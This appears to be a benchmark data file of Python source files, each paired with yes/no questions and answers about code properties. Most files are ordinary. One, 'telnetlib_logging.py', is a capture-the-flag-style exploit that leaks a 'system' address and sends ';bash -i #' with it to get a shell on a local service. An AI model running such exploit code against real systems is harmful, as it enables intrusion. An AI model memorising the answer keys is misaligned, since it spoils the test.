def __init__(self, unMensaje, unConjDeConfirmaciones):
self.confirmaciones = set(unConjDeConfirmaciones)
self.msg = unMensaje
def puedeEliminarse(self):
return False
def estaPendiente(self):
return True
def enviarSiPendiente(self, unMensajero):
from .campania import Campania
from .mensaje import Mensaje
from .grupo import Grupo
receptores = self.msg.getCampania().getGrupoReceptores().getReceptores()
for receptor in receptores:
yaEnviado = False
for conf in self.confirmaciones:
if conf.getReceptor() == receptor:
yaEnviado = True
break
if not(yaEnviado):
confirmaciones.add(unMensajero.enviarMensajeA(self.msg, receptor))
self.msg.setEstado(MensajeEnviado(self.msg, confirmaciones))
def getConfirmaciones(self):
return set(self.confirmaciones)
def __str__(self):
return self.msg | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | isw2-master/src/app/core/mensajeParcialmenteEnviado.py | marlanbar/academic-projects |
#!/usr/bin/env python3
import telnetlib
import struct
import logging
HOST="localhost"
#while true; do nc -l -p 1111 -e /tmp/vuln; done
old_write=telnetlib.Telnet.write
def write(self, str_: bytes):
try:
print("w: ",str_.decode("utf-8"))
except UnicodeDecodeError:
print("w: ",str_)
old_write(self,str_)
telnetlib.Telnet.write=write
old_read_until=telnetlib.Telnet.read_until
def read_until(self, *args, **kwargs):
s=old_read_until(self,*args, **kwargs)
try:
print("r: ", s.decode("utf-8"))
except UnicodeDecodeError:
print("r: ",s)
return s
telnetlib.Telnet.read_until=read_until
tn = telnetlib.Telnet(HOST,1111)
tn.read_until(match=b": ")
tn.write(b"4\n")
help_txt=tn.read_until(match=b": ")
system=help_txt.decode("utf-8").split("- ")[1].split("\n")[0]
system=int(system,16)
tn.write(b"1\n")
tn.read_until(match=b": ")
system=struct.pack("I",system)
tn.write(b";bash -i #\x00\x00\x00\x00"+system+b"\n")
print("enjoy the shell")
tn.interact()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": fals... | 3 | random_stuff/telnetlib_logging.py | adw1n/competitive-programming |
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
data = pd.read_csv("ex1data1.txt",names = ['population','profit'])
x = data.population
y = data.profit
"初始化,所有变量都是matrix"
df = data.copy()#因为insert会改变原数组,所以先复制一份,坑1.
df.insert(0,"one",1)
X = df.iloc[:,0:df.shape[1]-1]
y = df.iloc[:,df.shape[1]-1:df.shape[1]]#df.iloc[:,-1]是个一维数组(series),reshape(97,1)都不行,坑2.
theta = np.zeros(X.shape[1])
y = np.matrix(y)
X = np.matrix(X)
x = np.matrix(x)
x = x.T #行向量/列向量傻傻分不清 坑3
theta = np.matrix(theta)
H = X*(theta.T)
"""计算代价"""
def costfunction(X,y,H):
n = np.power((H-y),2)
return np.sum(n)/(2*len(X))
"""批量梯度下降"""
alpha = 0.01
m = len(X)
times = 1000
def gradient_descent(theta,X,y,alpha,m,H,times):
thetas_0 = [0]
thetas_1 = [0]
cost = [costfunction(X,y,H)]
for i in range(times):
H = X*theta.T
erro = H - y
temp = np.matrix([0,0])
temp = theta - erro.T * X * alpha/m #矩阵运算是精髓,临时变量很重要.坑4
thetas_0.append(temp[0,0])
thetas_1.append(temp[0,1])
theta = temp
cost.append(costfunction(X,y,H))
return theta,cost,thetas_0,thetas_1
final_theta,cost,thetas_0,thetas_1= gradient_descent(theta,X,y,alpha,m,H,times)
print(final_theta,'\n',cost,'\n',thetas_0,'\n',thetas_1)
"""绘图"""
fig,(ax1,ax2) = plt.subplots(2,1)
H = final_theta * X.T
H = H.T
ax1.plot(x,H,c = 'r',label = 'Prediction')
ax1.scatter(data.population,data.profit,label = 'data')
ax1.legend(loc = 2)
ax2.plot(cost)
ax1.set_xlabel('population')
ax1.set_ylabel('profit')
ax1.set_title('relationship between population and profit'.title())
ax2.set_xlabel('times')
ax2.set_ylabel('cost')
ax2.set_title('how does cost changed'.title())
fig.subplots_adjust(hspace = 0.8)
plt.show() | [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding ... | 3 | code-homework/ML/ex1_Linear Regression/ex1_batch.py | phww/Andrew.Ng-ML-Study |
# coding: utf-8
"""
Instagram API
The Instagram Private API in OpenAPI specs.v3.0 # noqa: E501
OpenAPI spec version: 0.0.1
GitHub repo: https://github.com/instagrambot/instagram-api-toolkit
"""
from __future__ import absolute_import
import unittest
import private_instagram_sdk
from JsonObject.clsJsonObject import JsonObject # noqa: E501
from private_instagram_sdk.rest import ApiException
class TestJsonObject(unittest.TestCase):
"""JsonObject unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testJsonObject(self):
"""Test JsonObject"""
# FIXME: construct object with mandatory attributes with example values
# model = private_instagram_sdk.models.clsJsonObject.JsonObject() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
}... | 3 | sdks/python/test/test_JsonObject.py | pormes/pormes_bot17 |
# *** WARNING: this file was generated by the Kulado Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import kulado
import kulado.runtime
import warnings
from ... import tables, version
class PodTemplateList(kulado.CustomResource):
"""
PodTemplateList is a list of PodTemplates.
"""
def __init__(self, resource_name, opts=None, items=None, metadata=None, __name__=None, __opts__=None):
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, kulado.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
__props__['apiVersion'] = 'v1'
__props__['kind'] = 'PodTemplateList'
if items is None:
raise TypeError('Missing required property items')
__props__['items'] = items
__props__['metadata'] = metadata
if opts is None:
opts = kulado.ResourceOptions()
if opts.version is None:
opts.version = version.get_version()
super(PodTemplateList, self).__init__(
"kubernetes:core/v1:PodTemplateList",
resource_name,
__props__,
opts)
def translate_output_property(self, prop: str) -> str:
return tables._CASING_FORWARD_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return tables._CASING_BACKWARD_TABLE.get(prop) or prop
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than cl... | 3 | sdk/python/pulumi_kubernetes/core/v1/PodTemplateList.py | kulado/kulado-kubernetes |
from multiprocessing import Pool
import argparse
import glob
import os
import io
import time
import logging
import gluonnlp as nlp
import tokenizer as tokenization
parser = argparse.ArgumentParser(description='BERT tokenizer')
parser.add_argument('--input_files', type=str, default='wiki_*.doc',
help='Input files. Default is "wiki_*.doc"')
parser.add_argument('--nworker', type=int, default=8,
help='Number of workers for parallel processing.')
args = parser.parse_args()
args = parser.parse_args()
input_files = sorted(glob.glob(os.path.expanduser(args.input_files)))
num_files = len(input_files)
num_workers = args.nworker
logging.basicConfig(level=logging.INFO)
logging.info("Number of input files to process = %d"%(num_files))
# TODO(haibin) tokenize with vocab
exclude_patterns = [
'< no ##in ##cl ##ude >\n'
]
def in_pattern(x):
for pattern in exclude_patterns:
if len(x) == len(pattern) and x == pattern:
return True
return False
def f(input_file):
with io.open(input_file, 'r', encoding="utf-8") as fin:
assert input_file.endswith('.tokens'), 'Expects .doc suffix for input files'
with io.open(input_file.replace('.tokens', '.tks'), 'w', encoding="utf-8") as fout:
new_doc = True
with io.open(input_file, 'r', encoding="utf-8") as fin:
lines = fin.readlines()
for line in lines:
if new_doc:
new_doc = False
elif len(line) == 1 and line[0] == '\n':
new_doc = True
fout.write(u'\n')
elif in_pattern(line):
pass
else:
fout.write(line)
if __name__ == '__main__':
tic = time.time()
p = Pool(num_workers)
p.map(f, input_files)
toc = time.time()
logging.info("Processed %s in %.2f sec"%(args.input_files, toc-tic))
| [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | do_trim.py | eric-haibin-lin/text-proc |
"""AyudaEnPython: https://www.facebook.com/groups/ayudapython
# ------------------------ Enunciado Original -------------------------
Pedir al usuario la cantidad de números de la secuencia de Fibonacci
que desea ver.
Por ejemplo si el usuario digita 10, deberá mostrarse en pantalla la
secuencia:
1, 1, 2, 3, 5, 8, 13, 21, 34, 55
# ---------------------------------------------------------------------
NOTE: la secuencia para n = 10 es: 0, 1, 1, 2, 3, 5, 8, 13, 21, 34
"""
from unittest import main, TestCase
from typing import Generator, List
def fibonacci_while(n: int) -> Generator[int, None, None]:
"""Genera la secuencia de Fibonacci de 'n' elementos.
:param n: cantidad de elementos de la secuencia
:n type: int
:return: secuencia de Fibonacci
:rtype: Generator[int, None, None]
"""
a, b = 0, 1
while n > 0:
yield a
a, b = b, a + b
n -= 1
def fibonacci_for(n: int) -> List[int]:
"""Genera la secuencia de Fibonacci de 'n' elementos.
:param n: cantidad de elementos de la secuencia
:n type: int
:return: secuencia de Fibonacci
:rtype: List[int]
"""
secuencia = [0, 1]
for i in range(2, n):
secuencia.append(secuencia[i - 1] + secuencia[i - 2])
return secuencia
def main_(): # comment/uncomment to switch between while and for versions
n = int(input("Ingrese la cantidad de elementos de la secuencia: "))
print(", ".join(str(x) for x in fibonacci_while(n)))
#print(", ".join(str(x) for x in fibonacci_for(n)))
class Test(TestCase):
def test_functions(self):
for function in (fibonacci_while, fibonacci_for):
self.assertEqual(list(function(10)), [0, 1, 1, 2, 3, 5, 8, 13, 21, 34])
if __name__ == "__main__":
# main() # uncomment this line and comment the next one to run the tests
main_() | [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},... | 3 | soluciones/serie_fibonacci.py | AyudaEnPython/Soluciones |
# coding: utf-8
"""
RadioManager
RadioManager # noqa: E501
OpenAPI spec version: 2.0
Contact: support@pluxbox.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import radiomanager_sdk
from radiomanager_sdk.models.station_result_station import StationResultStation # noqa: E501
from radiomanager_sdk.rest import ApiException
class TestStationResultStation(unittest.TestCase):
"""StationResultStation unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testStationResultStation(self):
"""Test StationResultStation"""
# FIXME: construct object with mandatory attributes with example values
# model = radiomanager_sdk.models.station_result_station.StationResultStation() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
{
"point_num": 1,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false... | 3 | test/test_station_result_station.py | Pluxbox/radiomanager-python-client |
import unittest
import pytest
import cupy
import cupyx
class TestSyncDetect(unittest.TestCase):
def test_disallowed(self):
a = cupy.array([2, 3])
with cupyx.allow_synchronize(False):
with pytest.raises(cupyx.DeviceSynchronized):
a.get()
def test_allowed(self):
a = cupy.array([2, 3])
with cupyx.allow_synchronize(True):
a.get()
def test_nested_disallowed(self):
a = cupy.array([2, 3])
with cupyx.allow_synchronize(True):
with cupyx.allow_synchronize(False):
with pytest.raises(cupyx.DeviceSynchronized):
a.get()
def test_nested_allowed(self):
a = cupy.array([2, 3])
with cupyx.allow_synchronize(False):
with cupyx.allow_synchronize(True):
a.get()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
... | 3 | tests/cupy_tests/core_tests/test_syncdetect.py | svlandeg/cupy |
import os
import pandas as pd
import dill as pickle
from flask import Flask, jsonify, request
from utils import PreProcessing
app = Flask(__name__)
@app.route('/predict', methods=['POST'])
def apicall():
"""API Call
Pandas dataframe (sent as a payload) from API Call
"""
try:
test_json = request.get_json()
test = pd.read_json(test_json, orient='records')
#To resolve the issue of TypeError: Cannot compare types 'ndarray(dtype=int64)' and 'str'
test['Dependents'] = [str(x) for x in list(test['Dependents'])]
#Getting the Loan_IDs separated out
loan_ids = test['Loan_ID']
except Exception as e:
raise e
clf = 'model_v1.pk'
if test.empty:
return(bad_request())
else:
#Load the saved model
print("Loading the model...")
loaded_model = None
with open('./models/'+clf,'rb') as f:
loaded_model = pickle.load(f)
print("The model has been loaded...doing predictions now...")
predictions = loaded_model.predict(test)
"""Add the predictions as Series to a new pandas dataframe
OR
Depending on the use-case, the entire test data appended with the new files
"""
prediction_series = list(pd.Series(predictions))
final_predictions = pd.DataFrame(list(zip(loan_ids, prediction_series)))
"""We can be as creative in sending the responses.
But we need to send the response codes as well.
"""
responses = jsonify(predictions=final_predictions.to_json(orient="records"))
responses.status_code = 200
return (responses)
@app.errorhandler(400)
def bad_request(error=None):
message = {
'status': 400,
'message': 'Bad Request: ' + request.url + '--> Please check your data payload...',
}
resp = jsonify(message)
resp.status_code = 400
return resp | [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": fal... | 3 | flask_api/server.py | pedrocarvalhodev/flask_api |
from bpy.types import Node
from arm.logicnode.arm_nodes import *
import arm.nodes_logic
class TestNode(Node, ArmLogicTreeNode):
'''Test node'''
bl_idname = 'LNTestNode'
bl_label = 'Test'
bl_icon = 'GAME'
def init(self, context):
self.inputs.new('ArmNodeSocketAction', 'In')
self.outputs.new('ArmNodeSocketAction', 'Out')
def register():
# Add custom nodes
add_node(TestNode, category='Action')
# Register newly added nodes
arm.nodes_logic.register_nodes()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | dev_logicnode/Libraries/mynodes/blender.py | katharostech/armory_examples |
"""
Exception for errors raised by Basic Aer.
"""
from qiskit.exceptions import QiskitError
class C3QiskitError(QiskitError):
"""Base class for errors raised by C3 Qiskit Simulator."""
def __init__(self, *message):
"""Set the error message."""
super().__init__(*message)
self.message = " ".join(message)
def __str__(self):
"""Return the message."""
return repr(self.message)
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": true
}... | 3 | c3/qiskit/c3_exceptions.py | picbeats/c3 |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Lightning Callbacks used when training."""
import os
from pytorch_lightning import callbacks
class TransformersModelCheckpoint(callbacks.ModelCheckpoint):
"""Saves model and tokenizer in Transformers format when ModelCheckpoint does save.
This way it is possible to simply load the model (without training hparameters)
using transformers.from_pretrained. Also adds an attribute .last_checkpoint_path.
"""
def on_train_start(self, trainer, pl_module):
super(TransformersModelCheckpoint, self).on_train_start(trainer, pl_module)
self._model = pl_module.model
self._tokenizer = pl_module.schema_tokenizer
def _save_model(self, filepath):
super(TransformersModelCheckpoint, self)._save_model(filepath)
self.last_checkpoint_path = filepath
save_path = os.path.dirname(filepath)
self._model.save_pretrained(save_path)
self._tokenizer.save(save_path)
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (ex... | 3 | new_semantic_parsing/callbacks.py | nikhilgoel1997/new-semantic-parsing |
"""
Integration tests for __main__.py
"""
# pragma pylint: disable=redefined-outer-name
from click.testing import CliRunner
import pytest
from traveling_salesperson import __main__ as main
def test_main_runs(mocker, filename_fixture):
"""Ensures that main() runs smoothly over a test file."""
mock_etl = mocker.spy(main, 'etl')
mock_distance = mocker.spy(main, 'distance_matrix')
mock_path = mocker.spy(main, 'determine_path')
mock_plot = mocker.spy(main, 'plot_path')
# Test cli interface
runner = CliRunner()
result = runner.invoke(main.main, ['-f', filename_fixture])
assert result.exit_code == 0
mock_etl.assert_called_once_with(filename_fixture)
mock_distance.assert_called_once()
mock_path.assert_called_once()
mock_plot.assert_called_once()
@pytest.mark.parametrize('arg_list,error_code',
[(['-x', 'bad_arg'], 2), # Command line error
(['-m', 'de-sitter'], 2), # Command line error
(['-f', 'bad_file'], 1)]) # File not found error
def test_main_fails_with_bad_argument(arg_list, error_code):
"""Ensures that main() has an error (code -1) when run with unsupported arguments."""
runner = CliRunner()
result = runner.invoke(main.main, arg_list)
assert result.exit_code == error_code
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a ty... | 3 | tests/integration/test_main.py | benjaminkaplanphd/traveling-salesperson |
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from auto_scan_test import OPConvertAutoScanTest, BaseNet
from hypothesis import reproduce_failure
import hypothesis.strategies as st
import numpy as np
import unittest
import paddle
class Net(BaseNet):
"""
simple Net
"""
def forward(self, inputs):
"""
forward
"""
x = paddle.numel(inputs)
return x
class TestNumelConvert(OPConvertAutoScanTest):
"""
api: paddle.numel
OPset version: 7, 9, 15
"""
def sample_convert_config(self, draw):
input_shape = draw(
st.lists(
st.integers(
min_value=2, max_value=6), min_size=3, max_size=5))
dtype = draw(
st.sampled_from(
["float16", "float32", "float64", "int32", "int64"]))
config = {
"op_names": ["size"],
"test_data_shapes": [input_shape],
"test_data_types": [[dtype]],
"opset_version": [7, 9, 15],
"input_spec_shape": [],
}
models = Net(config)
return (config, models)
def test(self):
self.run_and_statis(max_examples=30)
if __name__ == "__main__":
unittest.main()
| [
{
"point_num": 1,
"id": "every_class_has_docstring",
"question": "Does every class in this file have a docstring?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
... | 3 | tests/test_auto_scan_size.py | neonhuang/Paddle2ONNX |
#!/usr/bin/env python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import yaml
def mergepwd(old, new, final, clean=False):
with open(old, "r") as old_file:
old_passwords = yaml.safe_load(old_file)
with open(new, "r") as new_file:
new_passwords = yaml.safe_load(new_file)
if not isinstance(old_passwords, dict):
print("ERROR: Old passwords file not in expected key/value format")
sys.exit(1)
if not isinstance(new_passwords, dict):
print("ERROR: New passwords file not in expected key/value format")
sys.exit(1)
if clean:
# keep only new keys
for key in new_passwords:
if key in old_passwords:
new_passwords[key] = old_passwords[key]
else:
# old behavior
new_passwords.update(old_passwords)
with open(final, "w") as destination:
yaml.safe_dump(new_passwords, destination, default_flow_style=False)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--old", help="old password file", required=True)
parser.add_argument("--new", help="new password file", required=True)
parser.add_argument("--final", help="merged password file", required=True)
parser.add_argument("--clean",
help="clean (keep only new keys)",
action='store_true')
args = parser.parse_args()
mergepwd(args.old, args.new, args.final, args.clean)
if __name__ == '__main__':
main()
| [
{
"point_num": 1,
"id": "has_nested_function_def",
"question": "Does this file contain any function defined inside another function?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"ans... | 3 | kolla_ansible/cmd/mergepwd.py | okleinschmidt/kolla-ansible |
#climber.py
#Robot Code For BlueCrew 6153
import wpilib
#Commands to make the robot climb.
class Climber:
climb_motor = wpilib.Talon
#Set robot to climb when motor is on.
def climb(self):
self.climb_motor.set(1)
#Stops the robot from climbing when motor is off.
def stop_climb(self):
self.climb_motor.set(0)
#Execute is a necessary method for robotpy
#DO NO DELETE
def execute(self):
pass
| [
{
"point_num": 1,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
... | 3 | components/climber.py | BlueCrewRobotics/2017Robot |
#!/usr/bin/env python
"""
Memory Loss
github.com/irlrobot/memory_loss
"""
from __future__ import print_function
from random import choice, shuffle
from alexa_responses import speech_with_card
from brain_training import QUESTIONS
def handle_answer_request(player_answer, session):
"""check if the answer is right, adjust score, and continue"""
print("=====handle_answer_request fired...")
attributes = {}
should_end_session = False
print("=====answer heard was: " + player_answer)
current_question = session['attributes']['question']
correct_answer = current_question['answer']
shuffle(QUESTIONS)
next_question = choice(QUESTIONS)
if correct_answer == player_answer:
answered_correctly = True
else:
log_wrong_answer(current_question['question'], player_answer, correct_answer)
answered_correctly = False
next_tts = "Next question in 3... 2... 1... " + next_question['question']
attributes = {
"question": next_question,
"game_status": "in_progress"
}
if answered_correctly:
speech_output = "Correct!" + next_tts
card_title = "Correct!"
else:
speech_output = "Wrong!" + next_tts
card_title = "Wrong!"
card_text = "The question was:\n" + current_question['question']
return speech_with_card(speech_output, attributes, should_end_session,
card_title, card_text, answered_correctly)
def log_wrong_answer(question, answer, correct_answer):
"""log all questions answered incorrectly so i can analyze later"""
print("[WRONG ANSWER]:" + question + ":" + answer + ":" + correct_answer)
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than... | 3 | src/handle_answer_request.py | irlrobot/memory_loss |
"""
Tiny little ORM (Object Relational Mapper) for SQLite.
"""
import logging
from .db_helpers import attrs
from .manager import Manager
logging.basicConfig(
filename='simple_orm_sqlite.log',
format='%(asctime)s - %(levelname)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S',
level=logging.INFO)
class Model:
db = None
def delete(self, type_check=True):
return self.__class__.manager(type_check=type_check).delete(self)
def save(self, type_check=True):
return self.__class__.manager(type_check=type_check).save(self)
def update(self, type_check=True):
return self.__class__.manager(type_check=type_check).update(self)
@property
def public(self):
return attrs(self)
def __repr__(self):
return str(self.public)
@classmethod
def manager(cls, db=None, type_check=True):
return Manager(db if db else cls.db, cls, type_check)
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "has_multiple_inheritance",
"question": "Does any class in this file use multiple inheritance?",
"answer": false
},... | 3 | orm/orm.py | draihal/simple_orm_sqlite |
class HashableList(object):
"""
A structure that stores a list of str()-able items,
but can also be used as a key in a dict.
This is not a very good general purpose data structure.
It has a very specific use in DetailsCompatibilityChecker.
"""
def __init__(self, delimiter=","):
self._str_representation = ""
self._list_representation = []
self._delimiter = delimiter
def add(self, item):
self._str_representation += str(item) + self._delimiter
self._list_representation.append(item)
def get_string(self):
return self._str_representation
def get_list(self):
return list(self._list_representation)
def __len__(self):
return len(self._list_representation)
def __hash__(self):
return hash(self._str_representation)
def __eq__(self, other):
return self.get_string() == other.get_string()
| [
{
"point_num": 1,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": true
},
{
"point_num": 2,
"id": "all_params_annotated",
"question": "Does every function parameter in this file have a type annotation (excluding self/cl... | 3 | rules_default/castervoice/lib/util/hashable_list.py | MLH-Fellowship/LarynxCode |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkoutboundbot.endpoint import endpoint_data
class SaveAfterAnswerDelayPlaybackRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'OutboundBot', '2019-12-26', 'SaveAfterAnswerDelayPlayback','outboundbot')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_StrategyLevel(self):
return self.get_query_params().get('StrategyLevel')
def set_StrategyLevel(self,StrategyLevel):
self.add_query_param('StrategyLevel',StrategyLevel)
def get_EntryId(self):
return self.get_query_params().get('EntryId')
def set_EntryId(self,EntryId):
self.add_query_param('EntryId',EntryId)
def get_AfterAnswerDelayPlayback(self):
return self.get_query_params().get('AfterAnswerDelayPlayback')
def set_AfterAnswerDelayPlayback(self,AfterAnswerDelayPlayback):
self.add_query_param('AfterAnswerDelayPlayback',AfterAnswerDelayPlayback) | [
{
"point_num": 1,
"id": "every_function_has_docstring",
"question": "Does every function in this file have a docstring?",
"answer": false
},
{
"point_num": 2,
"id": "every_function_under_20_lines",
"question": "Is every function in this file shorter than 20 lines?",
"answer": tru... | 3 | aliyun-python-sdk-outboundbot/aliyunsdkoutboundbot/request/v20191226/SaveAfterAnswerDelayPlaybackRequest.py | yndu13/aliyun-openapi-python-sdk |
# -*- coding: utf-8 -*-
from unisim import DB
class DummyDB(DB):
def connect(self):
pass
def disconnect(self):
pass
def init_table(self):
pass
def store(self, tick, objects):
pass
| [
{
"point_num": 1,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written in snake_case?",
"answer": true
},
{
"point_num": 2,
"id": "more_functions_than_classes",
"question": "Does this file define more functions than classes?",
"answer": ... | 3 | simdata/hakata/script/dummy_db.py | RDC4Smart-Mobility/UniSim |
# -*- coding: utf-8 -*-
from __future__ import print_function, division, absolute_import
import numba
from numba import *
from numba import error, nodes
from numba.type_inference import module_type_inference
from numba import typesystem
if PY3:
import builtins
else:
import __builtin__ as builtins
debug = False
#debug = True
def resolve_function(func_variable):
"Get a function object given a function name"
func = None
func_type = func_variable.type
if func_type.is_builtin:
func = getattr(builtins, func_variable.name)
elif func_type.is_global:
func = func_type.value
elif func_type.is_module_attribute:
func = getattr(func_type.module, func_type.attr)
elif func_type.is_autojit_function:
func = func_type.autojit_func
elif func_type.is_jit_function:
func = func_type.jit_func
return func
def infer_typefunc(context, call_node, func_type, default_node):
func_var = call_node.func.variable
if func_var.is_constant:
func_type = typesystem.KnownValueType(func_var.constant_value)
if (func_type.is_known_value and
module_type_inference.is_registered(func_type.value)):
# Try the module type inferers
result_node = module_type_inference.resolve_call_or_none(
context, call_node, func_type)
if result_node:
return result_node
return default_node
def parse_signature(node, func_type):
types = []
for arg in node.args:
if not arg.variable.type.is_cast:
raise error.NumbaError(arg, "Expected a numba type")
else:
types.append(arg.variable.type)
signature = func_type.dst_type(*types)
new_node = nodes.const(signature, typesystem.CastType(signature))
return new_node
| [
{
"point_num": 1,
"id": "no_function_exceeds_5_params",
"question": "Does every function in this file take 5 or fewer parameters (excluding self/cls)?",
"answer": true
},
{
"point_num": 2,
"id": "all_function_names_snake_case",
"question": "Are all function names in this file written... | 3 | numba/type_inference/infer_call.py | shiquanwang/numba |
from .create_db import db
class CompoundETH(db.Model):
__tablename__ = 'compound'
id = db.Column('id', db.Integer, primary_key=True)
blocknumber = db.Column('blocknumber', db.Integer)
timestamp = db.Column('timestamp', db.Integer)
price = db.Column('price', db.Float)
def __repr__(self):
return '{}, {}, {}'.format(self.blocknumber, self.timestamp, self.price)
class CompoundBTC(db.Model):
__tablename__ = 'compoundbtc'
id = db.Column('id', db.Integer, primary_key=True)
blocknumber = db.Column('blocknumber', db.Integer)
timestamp = db.Column('timestamp', db.Integer)
